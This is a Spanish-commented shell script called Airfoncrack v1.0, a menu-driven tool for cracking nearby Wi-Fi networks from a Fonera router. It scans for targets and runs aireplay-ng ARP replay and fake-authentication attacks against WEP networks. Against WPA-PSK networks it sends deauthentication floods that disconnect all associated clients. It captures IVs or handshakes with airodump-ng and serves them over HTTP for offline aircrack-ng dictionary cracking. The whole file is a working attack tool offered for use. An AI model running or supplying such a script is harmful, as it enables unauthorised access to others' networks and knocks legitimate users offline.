#!/bin/ash # Airfoncrack # Script para crack de wireless automático # v1.0 por Nitz # Agradecimientos a wireless, lemmke, badblody y ring0 # Fecha de inicio: 5-04-2007 # Fecha final: 11-04-2007 saca_ip(){ IP=`ifconfig eth0 | grep "inet addr:" | sed 's/ inet addr://g' | awk '{ print $1 }'` } prepara_escanear() { wlanconfig ath0 destroy 1>/dev/null 2>/dev/null 3>/dev/null wlanconfig ath1 destroy 1>/dev/null 2>/dev/null 3>/dev/null wlanconfig kis0 destroy 1>/dev/null 2>/dev/null 3>/dev/null wlanconfig wifi0 destroy 1>/dev/null 2>/dev/null 3>/dev/null wlanconfig ath1 create wlandev wifi0 wlanmode sta 1>/dev/null 2>/dev/null 3>/dev/null ifconfig ath1 up 1>/dev/null 2>/dev/null 3>/dev/null } prepara_crack() { wlanconfig ath0 destroy 1>/dev/null 2>/dev/null 3>/dev/null wlanconfig ath1 destroy 1>/dev/null 2>/dev/null 3>/dev/null wlanconfig kis0 destroy 1>/dev/null 2>/dev/null 3>/dev/null wlanconfig wifi0 destroy 1>/dev/null 2>/dev/null 3>/dev/null wlanconfig ath0 create wlandev wifi0 wlanmode monitor 1>/dev/null 2>/dev/null 3>/dev/null iwconfig ath0 rate 1M 1>/dev/null 2>/dev/null 3>/dev/null ifconfig ath0 up 1>/dev/null 2>/dev/null 3>/dev/null } buscaredes() { iwlist ath1 scan > /tmp/airfoncrack.temp BSSID=`grep " Cell " /tmp/airfoncrack.temp | awk '{ print $5 }'` current=1 cadena="dialog --backtitle \"AirFonCrack v1.0 by Nitz\" --menu \"Select a wireless network:\\n CH# . BSSID . . . . . . ESSID\" 0 0 0 " for i in `echo $BSSID`; do CANAL=`grep "(Channel " /tmp/airfoncrack.temp | awk '{ print $4 }' | sed 's/)$//g' | sed -n "$current p"` ESSID=`grep ESSID /tmp/airfoncrack.temp | sed 's/ ESSID:"//g' | sed 's/"$//g' | sed -n "$current p" | sed 's/"/\\\"/g'` cadena=$cadena$(echo "\"$CANAL $i $ESSID\" \"\" ") let current=$current+1 done; cadena=$cadena$(echo " 2>/tmp/airfoncrack.temp") sh -c "$cadena" ESSID=`awk '{ print $3 }' /tmp/airfoncrack.temp | sed 's/"/\\\"/g'` BSSID=`awk '{ print $2 }' /tmp/airfoncrack.temp` CANAL=`awk '{ print $1 }' /tmp/airfoncrack.temp` if [ -z $ESSID ]; then rm /tmp/airfoncrack.temp clear exit; fi; } wepowpa() { dialog --backtitle "AirFonCrack v1.0 by Nitz" --menu "What do you want to crack?" 0 0 0 "WEP" "" "WPA-PSK" "" 2>/tmp/airfoncrack.temp ENCRIPTACION=`cat /tmp/airfoncrack.temp` if [ -z $ENCRIPTACION ]; then rm /tmp/airfoncrack.temp clear exit; fi; } crackwep() { rm /tmp/www/airfoncrack-packages* dialog --backtitle "AirFonCrack v1.0 by Nitz" --infobox "Please, wait..." 3 19 aireplay-ng -3 ath0 -b $BSSID -h $MAC ath0 1>/dev/null 2>/dev/null 3>/dev/null & while true; do aireplay-ng -1 1 -e \"$ESSID\" -a $BSSID -h $MAC ath0 1>/dev/null 2>/dev/null 3>/dev/null; done & dialog --backtitle "AirFonCrack v1.0 by Nitz" --menu "Now airodump-ng is sniffing ivs. You can crack these ivs with aircrack-ng in fonera, but is better crack these ivs in your PC. What do you want to do?" 0 0 0 "Crack ivs in my PC" "" "Crack ivs with fonera software" "" 2>/tmp/airfoncrack.temp case `cat /tmp/airfoncrack.temp` in 'Crack ivs in my PC') dialog --backtitle "AirFonCrack v1.0 by Nitz" --msgbox "You can dowload ivs file from http://$IP/airfoncrack-packages-01.ivs and try to crack with your aircrack-ng :)" 0 0 rm /tmp/airfoncrack.temp airodump-ng --ivs -w /tmp/www/airfoncrack-packages --channel $CANAL --bssid $BSSID ath0 ;; 'Crack ivs with fonera software') clear airodump-ng --ivs -w /tmp/www/airfoncrack-packages --channel $CANAL --bssid $BSSID ath0 1>/dev/null 2>/dev/null 3>/dev/null & dialog --backtitle "AirFonCrack v1.0 by Nitz" --infobox "Please, wait..." 3 19 sleep 10 aircrack-ng /tmp/www/airfoncrack-packages-01.ivs echo echo "Aircrack have stopped. If you haven't the WEP key because you don't have enough ivs yet, you can rerun 'aircrack-ng /tmp/www/airfoncrack-packages-01.ivs'." ;; *) rm /tmp/airfoncrack.temp clear exit ;; esac echo echo "Remember: You can download ivs file from http://$IP/airfoncrack-packages-01.ivs and try to crack with your aircrack-ng :)" echo echo "Now a lot of processes are working, airodump-ng and aireplay-ng. You can kill them running 'killall airfoncrack & killall aireplay-ng & killall airodump-ng'." exit } crackwpapsk() { rm /tmp/www/airfoncrack-packages* airodump-ng --ivs -w /tmp/www/airfoncrack-packages --channel $CANAL --bssid $BSSID ath0 1>/dev/null 2>/dev/null 3>/dev/null & if dialog --backtitle "AirFonCrack v1.0 by Nitz" --yesno "Fonera needs snif a handshake. You can cause it selecting \"Yes\", but all asociated stations will fall.\n\nDo you want to cause the handshake?" 0 0; then dialog --backtitle "AirFonCrack v1.0 by Nitz" --infobox "Please, wait..." 3 19 aireplay-ng -0 5 -a $BSSID ath0 1>/dev/null 2>/dev/null 3>/dev/null while dialog --backtitle "AirFonCrack v1.0 by Nitz" --yesno "Do you want to repeat the attack?" 0 0; do dialog --backtitle "AirFonCrack v1.0 by Nitz" --infobox "Please, wait..." 3 19 aireplay-ng -0 5 -a $BSSID ath0 1>/dev/null 2>/dev/null 3>/dev/null; done; fi; dialog --backtitle "AirFonCrack v1.0 by Nitz" --msgbox "You must dowload ivs file from http://$IP/airfoncrack-packages-01.ivs and try to crack with your aircrack-ng :)" 0 0 rm /tmp/airfoncrack.temp clear echo "Remember: You must download ivs file from http://$IP/airfoncrack-packages-01.ivs and try to crack with your aircrack-ng :)"; echo echo "For get the WPA-PSK key, run in your PC: aircrack-ng -a 2 /PATH/airfoncrack-packages-01.ivs -w /PATH/dictionary-file" echo echo "Now a lot of processes are working, airodump-ng and aireplay-ng. You can kill them running 'killall airfoncrack & killall aireplay-ng & killall airodump-ng'." exit } trap "echo echo \"Maybe airodump-ng and aireplay-ng are running, try to run 'killall airfoncrack & killall airodump-ng & killall aireplay-ng'\" exit" 1 2 3 9 15 saca_ip prepara_escanear dialog --backtitle "AirFonCrack v1.0 by Nitz" --infobox "Please, wait..." 3 19 sleep 3 buscaredes wepowpa prepara_crack dialog --backtitle "AirFonCrack v1.0 by Nitz" --infobox "Please, wait..." 3 19 sleep 5 MAC=`ifconfig | grep wifi0 | awk '{ print $5 }'` case $ENCRIPTACION in 'WEP' ) crackwep ;; 'WPA-PSK' ) crackwpapsk ;; esac